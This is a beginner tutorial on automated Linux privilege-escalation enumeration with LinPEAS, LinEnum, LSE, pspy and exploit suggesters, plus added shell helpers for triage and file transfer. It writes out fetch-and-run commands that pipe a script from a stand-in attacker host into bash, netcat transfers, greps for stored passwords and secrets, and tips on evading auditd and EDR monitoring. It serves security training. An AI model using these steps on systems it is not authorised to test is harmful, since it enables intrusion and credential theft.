Automated Enumeration Tools

Level: beginner | Time: 30 min | Type: Writeup

Using LinPEAS, LinEnum, and other automation tools

Learning Objectives

  • Use LinPEAS effectively
  • Interpret automated output
  • Use LinEnum and other tools
  • Prioritize findings

While manual enumeration is essential to understand, automated tools save time and catch things you might miss. LinPEAS is the de facto standard, but several tools exist for different situations.

Think of these tools as an automated detective: they run hundreds of checks in seconds and highlight likely privilege escalation vectors. They are also noisy. A single run walks most of the filesystem and spawns hundreds of child processes, which is exactly the behaviour auditd rules and EDR agents are tuned to flag, so know when to use them.

Detection Risk

Automated enumeration tools are LOUD. They read thousands of files, exec hundreds of processes and, unless run from memory, drop a recognisable script on disk; all of that shows up in auditd, process-execution telemetry and file-integrity monitoring. In red team scenarios, use them only after you have assessed what monitoring is in place, or fall back to manual techniques.

LinPEAS

LinPEAS (Linux Privilege Escalation Awesome Script), part of the PEASS-ng project, is the most comprehensive of these tools. It runs hundreds of checks (kernel and userland CVEs, sudo rules, SUID/SGID binaries, capabilities, cron and timers, writable paths, credentials in config files, container escapes) and colour-codes each finding by how likely it is to be a usable vector.

```bash
# Download and run directly on the target (requires outbound internet from the target)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Download to your attack machine first
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh

# Transfer to target and run
python3 -m http.server 80        # on attacker
wget http://attacker/linpeas.sh  # on target
chmod +x linpeas.sh
./linpeas.sh

# Save output (tee keeps the colour codes; read the file back with less -R)
./linpeas.sh | tee linpeas_output.txt

# Run in background
./linpeas.sh > linpeas_output.txt 2>&1 &
```

LinPEAS Color Coding

Colour meanings (LinPEAS prints this legend at the top of every run):
RED/YELLOW (red text on yellow background) = "95% a PE vector", almost certainly exploitable
RED = you should take a look, high chance of privesc
YELLOW = interesting, worth investigating
GREEN = common/informational (users, mounts, cron jobs, services)
CYAN = users with a console
BLUE = users without a console, mounted devices
MAGENTA = your own username

Look for:
├── CVE checks (kernel, sudo, pkexec)
├── SUID/SGID binaries
├── Sudo permissions
├── Interesting files
├── Credentials in configs
├── Writable paths
└── Container escapes

LinPEAS Options

```bash
# Print the option list; always check it, flags change between releases
./linpeas.sh -h

# Suppress the banner (this is not a "quick mode")
./linpeas.sh -q

# Stealth / superfast: skips the time-consuming checks
./linpeas.sh -s

# All checks, including the slow ones (process monitoring, su brute force) - CTF mode, very noisy
./linpeas.sh -a

# No colours (when you will grep the saved output anyway)
./linpeas.sh -N

# Run only selected check groups, comma-separated; the valid group names are listed in -h
./linpeas.sh -o users_information
./linpeas.sh -o container
./linpeas.sh -o system_information,interesting_perms_files
# There is no per-check skip flag; use -o to pick what runs instead

# Supply a password you already know so the sudo -l and su checks can use it
./linpeas.sh -P 'Password123'
```

Parse the Output

LinPEAS output is huge. Scroll through once looking only at colours, then grep the saved file. Plain-text greps (`grep -i password`, `grep -i suid`) work, but the highest-value filter is the colour itself: the red-on-yellow highlight is what the legend calls "95% a PE vector", so pull out the lines carrying that escape sequence first. Grepping for the literal string `95%` only finds the legend line, not the findings.
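The triage below is an added example, not part of LinPEAS: it sorts a saved run by the ANSI colour LinPEAS used, so the red-on-yellow findings surface before the merely red ones. It assumes the highlight sequences LinPEAS uses in the versions I have seen (`ESC[1;31;103m` for red/yellow, `ESC[1;31m` for red); confirm against your copy with `grep -n SED_RED linpeas.sh`. The four sample lines in `make_sample` are constructed to look like LinPEAS output and are not from a real run.

```sh
#!/bin/sh
# Added example (not LinPEAS code): triage a saved LinPEAS run by highlight colour.
# Assumed sequences (verify with: grep -n 'SED_RED' linpeas.sh):
#   ESC[1;31;103m  red text on yellow background  -> the legend's "95% a PE vector"
#   ESC[1;31m      plain red                      -> "you should take a look"
ESC=$(printf '\033')
RY="${ESC}\[1;31;103m"
RED="${ESC}\[1;31m"

# Remove every ANSI colour code so lines grep and diff cleanly afterwards.
strip_ansi() { sed "s/${ESC}\[[0-9;]*m//g"; }

# count_hits FILE LEVEL -> number of lines at that level (ry = red/yellow, red = red only)
count_hits() {
    case "$2" in
        ry)  grep -ac "$RY" "$1" || true ;;
        red) grep -av "$RY" "$1" | grep -ac "$RED" || true ;;
    esac
}

# triage FILE -> red/yellow lines first, then red, tagged by severity, colour codes stripped
triage() {
    grep -a "$RY" "$1" | strip_ansi | sed 's/^/[RED\/YELLOW] /'
    grep -av "$RY" "$1" | grep -a "$RED" | strip_ansi | sed 's/^/[RED] /'
}

# make_sample FILE -> a constructed four-line stand-in for a LinPEAS run (not real output)
make_sample() {
    printf '%s\n' \
        "${ESC}[1;31;103mCVE-2021-4034${ESC}[0m pkexec might be vulnerable" \
        "Sudoers entry: (root) NOPASSWD: ${ESC}[1;31m/usr/bin/find${ESC}[0m" \
        "${ESC}[1;32m/usr/bin/passwd${ESC}[0m (standard SUID binary)" \
        "/tmp/linpeas.sh" > "$1"
}

# Usage on a real run:  ./linpeas.sh | tee linpeas_output.txt; sh triage.sh linpeas_output.txt
if [ -n "${1:-}" ] && [ -f "$1" ]; then triage "$1"; fi
```

The colour filter is deliberately narrow: green and cyan lines are the bulk of the output and almost never the vector, so they are dropped entirely; if you need them, `strip_ansi < linpeas_output.txt` gives you a clean file to grep.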

LinEnum

LinEnum is an older but still useful enumeration script. It's simpler than LinPEAS, which can be an advantage when you want focused output.

```bash
# Download
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh

# Basic run
./LinEnum.sh

# Thorough mode (slower: extra file searches)
./LinEnum.sh -t

# Report mode: name the report file
./LinEnum.sh -r report.txt

# Export interesting files to a directory
./LinEnum.sh -e /tmp/exports/

# Search for a keyword in config and log files
./LinEnum.sh -k password

# Supply the current user's password so sudo checks can run (the script warns this is insecure)
./LinEnum.sh -s
```

LinEnum Sections

LinEnum checks:
├── System Information
├── User/Group Info
├── Environmental Info
├── Jobs/Tasks
├── Services
├── Software
├── Interesting Files
├── Files with SUID/SGID
└── World-writable Files

Simpler than LinPEAS, but:
- Less comprehensive
- No CVE checks
- Less noise

Linux Smart Enumeration (LSE)

LSE tiers its output by importance, so by default you see only the findings that matter and ask for more when you need it.

```bash
# Download
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh

# Level 0 (default): highly important results only
./lse.sh

# Level 1: interesting results as well
./lse.sh -l 1

# Level 2: everything gathered (verbose)
./lse.sh -l 2

# Non-interactive: don't prompt for the current user's password (used for the sudo checks)
./lse.sh -i

# Run only selected sections or individual tests, comma-separated
# (sections include usr, sud, fst, sys, sec, ret, net, srv, pro, sof, ctn, cve)
./lse.sh -s sud,ret,usr

# Disable colour when saving to a file
./lse.sh -c
```

LSE Levels

Start with level 0 for quick wins. Only go to level 2 when you need exhaustive information. Higher levels mean more output to parse.

pspy - Process Spy

pspy shows you what other users, root included, are running, without needing root itself. It works because /proc is readable by every user on a default Linux install: pspy polls /proc for new PIDs and reads each one's command line and UID, and it also watches directories such as /usr, /tmp, /etc, /home, /var and /opt with inotify so that a file-system event triggers an immediate rescan. That is how it catches cron jobs and timers that run for only a few milliseconds and whose crontab you cannot read. Caveat: if /proc is mounted with hidepid=1 or hidepid=2, other users' processes are invisible and pspy sees only your own.

```bash
# Download the binary matching the target (uname -m)
# pspy64 for x86_64, pspy32 for 32-bit; statically linked pspy64s/pspy32s builds exist for minimal systems
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64

# Run and watch
./pspy64

# Output lines look like:
# CMD: UID=0 PID=1234 | /bin/bash /opt/backup.sh
# CMD: UID=0 PID=1235 | /usr/bin/python3 /root/scripts/check.py

# This reveals:
# - cron jobs whose crontab you cannot read
# - systemd timers and other scheduled tasks
# - root processes running scripts you may be able to write to

# Print file system events (inotify) as well as commands
./pspy64 -pf

# Polling interval in milliseconds (default 100); lower catches shorter-lived processes at higher CPU cost
./pspy64 -i 50
```

Let pspy Run

Cron jobs run on schedule. You might need to let pspy run for several minutes to catch hourly/daily tasks. Watch for patterns.
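To make the mechanism concrete, here is the core of what pspy does written in portable sh. This is an added example, not pspy's code: it snapshots /proc, sleeps, snapshots again and prints the difference. It misses anything shorter than the polling interval, which is the gap pspy closes with inotify-triggered rescans, and it is defeated by `hidepid` on /proc exactly as pspy is. The two snapshot files used to exercise `new_procs` in the test are constructed, not real.

```sh
#!/bin/sh
# Added example, not pspy's own code: poll /proc and report processes that appeared
# since the last snapshot. /proc is world-readable by default, so this works unprivileged.

# snapshot_procs -> one "UID=<uid> PID=<pid> | <cmdline>" line per live user-space process
snapshot_procs() {
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        [ -r "$p/cmdline" ] || continue
        # argv is NUL-separated in /proc/<pid>/cmdline; join it with spaces
        cmd=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null | sed 's/ *$//')
        [ -n "$cmd" ] || continue                  # kernel threads have an empty cmdline
        uid=$(awk '/^Uid:/ {print $2}' "$p/status" 2>/dev/null)   # real UID of the process
        printf 'UID=%s PID=%s | %s\n' "$uid" "$pid" "$cmd"
    done
}

# new_procs OLD NEW -> lines in snapshot file NEW that are not in OLD (exact whole-line match)
new_procs() { grep -vxFf "$1" "$2" || true; }

# watch_procs [SECONDS] -> loop forever printing newly seen processes (Ctrl-C to stop).
# sleep granularity is one second in POSIX sh; pspy polls every 100 ms and also reacts to inotify.
watch_procs() {
    old=$(mktemp); new=$(mktemp)
    snapshot_procs > "$old"
    while :; do
        sleep "${1:-1}"
        snapshot_procs > "$new"
        new_procs "$old" "$new"
        cp "$new" "$old"
    done
}

# Usage: sh procwatch.sh --watch 1   (leave it running for several minutes to catch hourly jobs)
[ "${1:-}" = "--watch" ] && watch_procs "${2:-1}"
```

Run it as a low-privilege user and you will still see `UID=0` lines for root's cron children, which is the whole point: the defence is not "don't run cron", it is mounting /proc with `hidepid=2` (or `hidepid=invisible` on newer kernels) so that unprivileged users cannot enumerate other users' processes at all.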

Linux Exploit Suggester

Linux Exploit Suggester (LES) compares the kernel version, distribution and installed packages against a list of known privilege escalation exploits and prints the candidates that match.

```bash
# Linux Exploit Suggester 2 (Perl)
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl

# Linux Exploit Suggester (mzet-, bash)
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

# Run offline on your own machine against a kernel string collected from the target
./linux-exploit-suggester.sh -k "$(uname -r)"

# Output lists candidate exploits, e.g.:
# [+] [CVE-2021-4034] PwnKit
#    Details: https://...
#    Exposure: probable
#    Tags: ubuntu=...
#    Download URL: https://...
```

Kernel Exploits are Risky

Kernel exploits can crash the system. Always check if there's an easier path (sudo, SUID, cron) before trying kernel exploits. Also read "Exposure: probable" as "the version string matches", not "this box is vulnerable": distributions backport fixes without bumping the version number, so confirm with the package changelog (`apt changelog`, `rpm -q --changelog`) or a non-destructive check before running anything.

Transferring Tools

```bash
# Method 1: Python HTTP server
# Attacker:
python3 -m http.server 80
# Target:
wget http://attacker_ip/linpeas.sh
curl http://attacker_ip/linpeas.sh -o linpeas.sh

# Method 2: Netcat (the receiving nc gets no end-of-file signal: compare sizes or hashes,
# then Ctrl-C the target side, or use -w/-q where your nc supports them)
# Attacker:
nc -lvnp 4444 < linpeas.sh
# Target:
nc attacker_ip 4444 > linpeas.sh

# Method 3: Base64 encode (works through any shell you can type into; -w0 is GNU coreutils only)
# Attacker:
base64 -w0 linpeas.sh
# Target:
echo "BASE64_STRING" | base64 -d > linpeas.sh

# Method 4: SCP (if you have SSH)
scp linpeas.sh user@target:/tmp/

# Method 5: Run from memory (no copy of the script on disk; the process still shows in ps
# and the URL lands in shell history unless you disable it)
curl http://attacker/linpeas.sh | bash
# Or:
bash <(curl -s http://attacker/linpeas.sh)

# Whatever the method, hash the file on both sides before trusting the results:
# a truncated copy fails partway through and you get a silently incomplete scan
sha256sum linpeas.sh
```
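The base64 method is the one that gets mangled most often (a single 800 KB line is more than some terminals and paste buffers will carry), so here is an added example, not from the page's tools, of a paste-safe version with an integrity check on both ends. It uses only POSIX tools plus `sha256sum` (GNU) or `shasum` (BSD/macOS), and the file it round-trips in the test is a constructed stand-in for linpeas.sh.

```sh
#!/bin/sh
# Added example: wrapped base64 transfer plus a sender/receiver hash check.

# pack FILE -> base64 on stdout, re-wrapped to 76 columns (portable: no -w0, no -b)
pack() { base64 < "$1" | tr -d '\n' | fold -w 76; printf '\n'; }

# unpack B64FILE OUT -> decode a wrapped or unwrapped blob back into OUT
unpack() { base64 -d < "$1" > "$2"; }

# digest FILE -> hex SHA-256 using whichever tool the host has
digest() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"; else shasum -a 256 "$1"; fi \
    | awk '{print $1}'
}

# verify FILE EXPECTED_HEX -> succeeds only if the received copy matches the sender's hash
verify() { [ "$(digest "$1")" = "$2" ]; }

# Sender:   pack linpeas.sh > blob.txt; digest linpeas.sh      (paste blob.txt and the hash)
# Receiver: cat > blob.txt  (paste, Ctrl-D); unpack blob.txt linpeas.sh
#           verify linpeas.sh <hash> && sh linpeas.sh || echo "transfer corrupted, do not run"
```

The same `digest`/`verify` pair is worth keeping for the netcat and HTTP methods too; the hash is cheap and a partial script that fails at line 3000 of 4000 looks, at a glance, like a machine with nothing to find.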

Interpreting Results

```bash
# Common findings, in the order you should work through them:

# 1. Sudo permissions
# Example output:
#   (root) NOPASSWD: /usr/bin/find
# → Check GTFOBins for find; a NOPASSWD entry for a GTFOBins binary is usually instant root

# 2. Userland CVE matches (LinPEAS marks these clearly)
# Example: CVE-2021-4034 PwnKit (pkexec), CVE-2021-3156 Baron Samedit (sudo)
# Unlike kernel exploits these are reliable and do not risk crashing the box

# 3. SUID binaries
# Look for:
# - custom binaries (not from a package, odd paths such as /opt or /usr/local)
# - system binaries that are not normally SUID
# - anything on GTFOBins

# 4. Writable scripts run by cron
# Example:
#   /opt/scripts/backup.sh is writable
#   cron runs it as root

# 5. Credentials
# Search output:
grep -i password linpeas_output.txt
grep -i credential linpeas_output.txt
grep -i secret linpeas_output.txt
```

Priority Order

Check in this order:
1. Sudo permissions → often instant root
2. Userland CVE matches (sudo, pkexec) → known exploits work
3. SUID binaries → easy if on GTFOBins
4. Cron jobs → if scripts are writable
5. Credentials → reuse for lateral movement
6. Kernel exploits → last resort (risky)

Don't just run exploits blindly!
Understand what the tool found.
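The first four steps of that order are quick enough to do by hand while LinPEAS is still scrolling, and doing them by hand is also the stealthy option the page keeps recommending. The script below is an added example, not from the page or any of the tools it covers: it wraps those checks in shell functions, and its crontab parser goes a little beyond the page by handling both the `m h dom mon dow user command` form and `@daily user command` shorthand. The crontab it is tested against is constructed; the `sudo` and `find` checks run against whatever machine you are on.

```sh
#!/bin/sh
# Added example: first-pass manual triage in priority order.

# 1. sudo: -n never prompts, so this is safe from a non-interactive shell.
#    NOPASSWD rules print; anything needing a password just errors out quietly.
check_sudo() { sudo -n -l 2>/dev/null; }

# 3. SUID binaries: -perm -4000 matches the setuid bit whatever the other bits are.
#    Compare each hit against GTFOBins and against what the distro ships as SUID.
list_suid() { find / -perm -4000 -type f 2>/dev/null; }

# 4. cron_commands CRONTAB -> the executable path from every job line in a system-format crontab
cron_commands() {
    # drop comments, blank lines and VAR=value settings, then take the command field
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" \
    | awk '$1 ~ /^@/ && NF >= 3 { print $3; next }
           NF >= 7 { print $7 }'
    # first pattern: "@reboot user command"; second: "min hour dom mon dow user command"
}

# writable_cron_scripts CRONTAB -> those commands the current user can modify.
# A root cron job running a script you can edit is the classic cron privesc.
writable_cron_scripts() {
    cron_commands "$1" | while IFS= read -r f; do
        if [ -w "$f" ]; then printf '%s\n' "$f"; fi
    done
}

# Usage on a live box:
#   check_sudo; list_suid
#   for c in /etc/crontab /etc/cron.d/*; do [ -f "$c" ] && writable_cron_scripts "$c"; done
```

Two things the automated tools tend to blur that this keeps explicit: `sudo -n -l` distinguishes "no sudo rights" from "sudo rights but needs a password" by its error text, and a cron script that is not writable itself may still sit in a directory you can write to, which `writable_cron_scripts` does not test for; check the parent directory by hand when the script path is under /opt or /usr/local.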

Tool Selection

Which Tool When

LinPEAS - default choice, most comprehensive
pspy    - when you suspect hidden cron jobs or timers
LES     - when looking for kernel exploits
LinEnum - when LinPEAS output is too noisy
Manual  - when stealth matters

Knowledge Check


What does red/yellow highlighting mean in LinPEAS output?

Challenges

Tool Comparison

Difficulty: beginner

Run LinPEAS and LinEnum on the same practice machine. Compare their outputs and note which findings each tool highlights that the other misses.


Key Takeaways

  • LinPEAS is the most comprehensive enumeration tool; start there
  • Colour coding sets priority: red/yellow is a near-certain vector, red deserves a look
  • pspy catches cron jobs and timers you cannot read by polling /proc; hidepid blinds it
  • Work sudo -l findings first, then userland CVEs, SUID, cron and credentials; kernel exploits last
  • Running from memory (curl | bash) leaves no script on disk, but the process and its file reads are still visible
  • Automated tools are noisy; weigh detection risk before you run them